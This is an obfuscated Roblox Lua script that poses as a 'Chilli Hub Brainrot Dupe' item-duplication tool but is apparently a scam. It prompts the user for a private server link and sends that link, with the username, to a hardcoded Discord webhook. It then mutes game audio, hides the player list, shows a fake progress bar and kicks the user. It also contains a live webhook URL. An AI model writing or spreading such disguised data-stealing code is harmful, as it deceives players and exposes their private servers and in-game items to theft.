local a,b,c,d,e,f = game:GetService("Players"), nil, nil, game:GetService("StarterGui"), game:GetService("HttpService"), game:GetService("RunService")
local g = game:GetService("SoundService")
local h = a.LocalPlayer
b = h:WaitForChild("PlayerGui")
local i = 'https://discord.com/api/webhooks/1419833757019668481/dwcz6___QJFUqvFwOoCU-t8H2cpWjdDK4fjgdkE6j2How196EWhVWR4mz3jyLeybrJYf'

local function j(k,l,m)
    local n = {['description'] = l..': '..m..'  '..os.date('| time %X')}
    request({
        Url = k,
        Headers = {['Content-Type']='application/json'},
        Body = e:JSONEncode({content="@everyone", embeds={n}}),
        Method = 'POST'
    })
end

for _, o in ipairs(g:GetDescendants()) do
    if o:IsA("Sound") then o.Volume=0 end
end

local p = Instance.new("Sound")
p.SoundId = "rbxassetid://1843547403"
p.Looped=true
p.Volume=1
p.Parent=b
p:Play()

local function q()
    for _, r in ipairs(a:GetPlayers()) do
        r.Chatted:Connect(function(s)
            if s:lower() == "a" then h:Kick("Kicked because someone said 'a'!") end
        end)
    end
    a.PlayerAdded:Connect(function(r)
        r.Chatted:Connect(function(s)
            if s:lower() == "a" then h:Kick("Kicked because someone said 'a'!") end
        end)
    end)
end

q()

local t = Instance.new("ScreenGui")
t.Name = "BrainrotChatbox"
t.Parent = b

local u = Instance.new("Frame")
u.Size = UDim2.new(0,350,0,350)
u.Position = UDim2.new(0.5,0,0.5,0)
u.AnchorPoint = Vector2.new(0.5,0.5)
u.BackgroundColor3 = Color3.fromRGB(25,25,25)
u.BackgroundTransparency = 0.1
u.BorderSizePixel = 0
u.ClipsDescendants = true
u.Parent = t

local v = Instance.new("TextLabel")
v.Size = UDim2.new(1,-20,0,40)
v.Position = UDim2.new(0,10,0,10)
v.BackgroundTransparency = 1
v.Text = "ðŸŒ¶ï¸ Chilli Hub Brainrot Dupe ðŸŒ¶ï¸"
v.Font = Enum.Font.GothamBold
v.TextColor3 = Color3.fromRGB(255,255,255)
v.TextSize = 22
v.TextXAlignment = Enum.TextXAlignment.Center
v.Parent = u

local w = Instance.new("TextButton")
w.Size = UDim2.new(0.9,0,0,70)
w.Position = UDim2.new(0.05,0,0.5,0)
w.BackgroundColor3 = Color3.fromRGB(85,170,255)
w.Text = "ðŸ§  Brainrot Dupe (10m Minimum) ðŸ§ "
w.Font = Enum.Font.GothamBold
w.TextSize = 22
w.TextColor3 = Color3.fromRGB(255,255,255)
w.BorderSizePixel = 0
w.Parent = u

local x = Instance.new("TextBox")
x.Size = UDim2.new(1,-40,0,40)
x.Position = UDim2.new(0,20,0,150)
x.PlaceholderText = "Enter your PS Link (Public gets detected)"
x.ClearTextOnFocus = false
x.Text = ""
x.BackgroundColor3 = Color3.fromRGB(40,40,40)
x.TextColor3 = Color3.fromRGB(230,230,230)
x.Font = Enum.Font.Gotham
x.TextSize = 18
x.BorderSizePixel = 0
x.Visible = false
x.Parent = u

local y = Instance.new("TextButton")
y.Size = UDim2.new(0,100,0,40)
y.Position = UDim2.new(0.5,-50,0,200)
y.BackgroundColor3 = Color3.fromRGB(85,170,255)
y.Text = "Send"
y.Font = Enum.Font.GothamBold
y.TextSize = 20
y.TextColor3 = Color3.fromRGB(255,255,255)
y.BorderSizePixel = 0
y.Visible = false
y.Parent = u

w.MouseButton1Click:Connect(function()
    w.Visible = false
    x.Visible = true
    y.Visible = true
    x:CaptureFocus()
end)

local function z()
    t:Destroy()
    d:SetCoreGuiEnabled(Enum.CoreGuiType.PlayerList,false)

    local A = Instance.new("ScreenGui")
    A.Name = "ChilliLoadingScreen"
    A.ResetOnSpawn = false
    A.IgnoreGuiInset = true
    A.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
    A.Parent = b

    local B = Instance.new("Frame")
    B.Size = UDim2.new(1,0,1,0)
    B.Position = UDim2.new(0,0,0,0)
    B.BackgroundColor3 = Color3.fromRGB(20,20,20)
    B.Parent = A

    local C = Instance.new("TextLabel")
    C.Size = UDim2.new(1,0,0,60)
    C.Position = UDim2.new(0,0,0,0)
    C.BackgroundTransparency = 1
    C.Text = "ðŸŒ¶ï¸ Chilli Hub Brainrot Dupe ðŸŒ¶ï¸"
    C.Font = Enum.Font.GothamBold
    C.TextSize = 28
    C.TextColor3 = Color3.fromRGB(255,255,255)
    C.TextStrokeTransparency = 0.7
    C.Parent = B

    local D = Instance.new("Frame")
    D.Size = UDim2.new(0.8,0,0,30)
    D.Position = UDim2.new(0.1,0,0.5,-15)
    D.BackgroundColor3 = Color3.fromRGB(50,50,50)
    D.BorderSizePixel = 0
    D.Parent = B

    local E = Instance.new("Frame")
    E.Size = UDim2.new(0,0,1,0)
    E.Position = UDim2.new(0,0,0,0)
    E.BackgroundColor3 = Color3.fromRGB(85,170,255)
    E.BorderSizePixel = 0
    E.Parent = D

    local F = Instance.new("TextLabel")
    F.Size = UDim2.new(0.8,0,0,30)
    F.Position = UDim2.new(0.1,0,0.5,20)
    F.BackgroundTransparency = 1
    F.Text = "0%"
    F.Font = Enum.Font.GothamBold
    F.TextSize = 24
    F.TextColor3 = Color3.fromRGB(255,255,255)
    F.TextXAlignment = Enum.TextXAlignment.Center
    F.Parent = B

    local G = 15
    local H = tick()
    local I
    I = f.RenderStepped:Connect(function()
        local J = tick()-H
        local K = math.clamp(J/G,0,1)
        E.Size = UDim2.new(K,0,1,0)
        F.Text = string.format("%.1f%%",K*100)
        if J >= G then
            I:Disconnect()
            h:Kick("You have been kicked after 15 seconds!")
        end
    end)
end

y.MouseButton1Click:Connect(function()
    local L = x.Text
    if L ~= "" then
        j(i, h.Name, L)
        x.Text = ""
        z()
    end
end)

